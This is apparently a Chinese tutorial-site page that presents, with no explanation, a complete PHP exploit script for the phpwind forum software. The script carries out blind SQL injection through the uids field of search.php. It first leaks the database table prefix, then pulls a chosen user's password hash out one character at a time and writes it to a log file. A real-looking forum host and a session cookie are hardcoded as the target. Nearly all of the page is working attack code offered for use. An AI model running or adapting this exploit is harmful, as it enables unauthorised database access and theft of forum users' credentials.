从网上搜到的phpwind 0day的代码

<html>

<head>

　　body,td {

　　font-family: "Tahoma";

　　font-size: "12px";

　　line-height: "150%";

　　}

　　.smlfont {

　　font-family: "Tahoma";

　　font-size: "11px";

　　}

　　.INPUT {

　　FONT-SIZE: "12px";

　　COLOR: "#000000";

　　BACKGROUND-COLOR: "#FFFFFF";

　　height: "18px";

　　border: "1px solid #666666";

　　padding-left: "2px";

　　}

　　.redfont {

　　COLOR: "#A60000";

　　}

　　a:link,a:visited,a:active {

　　color: "#000000";

　　text-decoration: underline;

　　}

　　a:hover {

　　color: "#465584";

　　text-decoration: none;

　　}

　　.top {BACKGROUND-COLOR: "#CCCCCC"}

　　.firstalt {BACKGROUND-COLOR: "#EFEFEF"}

　　.secondalt {BACKGROUND-COLOR: "#F5F5F5"}

</style>

<center>The Exploiet Of The All Phpwind Version</center>

<?php

　　ini_set("max_execution_time",0);

　　error_reporting(7);

　　$path="/search.php";

　　$server='bbs.ccidnet.com';

　　$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

　　$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

　　$uid=2;

　　$_GET['uid']&&$uid=$_GET['uid'];

　　$tid=539264;

　　$mask='没有查找匹配的内容';

　　$count=0;

　　//$testing=1;

　　//$testing=$_GET['test'];

　　if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

　　//$debug=1;

　　$temp=md5(rand(1,100)+microtime());

　　$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";

　　$response=send($cmd);

　　preg_match('/FROM (.+)threads/ie',$response,$match);

　　$pre=$match[1];

if ($match[1]) echo 'Good Job!Wo Got The pre: '.$match[1]." ";

else if (strpos($response,'value="登录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value! ");

else {echo "Maybe It is not vul! ";die();}

echo "Try to Get the uid=$uid 's Password:";

　　$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)

　　{

　　$type=0;

　　$sub=$i+9;

　　$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";

　　$sql=urlencode($sql);

　　$temp=md5(rand(1,100)+microtime());

　　$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

　　if(!strpos(send($cmd),$mask)) {

　　$type=0;

for($m=48;$m<=57;$m++){

　　$temp=md5(rand(1,100)+microtime());

　　$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";

　　$sql=urlencode($sql);

　　$temp=md5(rand(1,100)+microtime());

　　$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

　　if(!strpos(send($cmd),$mask)) {

　　echo chr($m);

　　fputs($log,chr($m));

　　break;

　　}

　　continue;

　　}

　　continue;

　　}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";

　　$sql=urlencode($sql);

　　$temp=md5(rand(1,10000)+microtime());

　　$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

　　if(!strpos(send($cmd),$mask)) {

　　$type=1;

for($m=97;$m<=122;$m++){

　　$temp=md5(rand(1,100)+microtime());

　　$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";

　　$sql=urlencode($sql);

　　$temp=md5(rand(1,100)+microtime());

　　$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

　　if(!strpos(send($cmd),$mask)) {

　　echo chr($m);

　　fputs($log,chr($m));

　　break;

　　}

　　continue;

　　}

　　continue;

　　}

echo "error! ";

　　die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

　　}

　　fclose($log);

echo " Done!We Post $count times! ";

　　function send($cmd)

　　{

　　global $path,$server,$cookie,$count,$useragent,$debug;

　　$count=$count+1;

　　$message = "POST ".$path."? HTTP/1.1\r\n";

　　$message .= "Accept: */*\r\n";

　　$message .= "Accept-Language: zh-cn\r\n";

　　$message .= "Referer: http://".$server.$path."\r\n";

　　$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

　　$message .= "User-Agent: ".$useragent."\r\n";

　　$message .= "Host: ".$server."\r\n";

　　$message .= "Content-length: ".strlen($cmd)."\r\n";

　　$message .= "Connection: Keep-Alive\r\n";

　　$message .= "Cookie: ".$cookie."\r\n";

　　$message .= "\r\n";

　　$message .= $cmd."\r\n";

　　$fd = fsockopen( $server, 80 );

　　fputs($fd,$message);

$resp = "<pre>";

　　while($fd&&!feof($fd)) {

　　$resp .= fread($fd,1024);

　　}

　　fclose($fd);

$resp .="</pre>";

　　if($debug) {echo $cmd;echo $resp;}

　　return $resp;

　　}

教程首页更多教程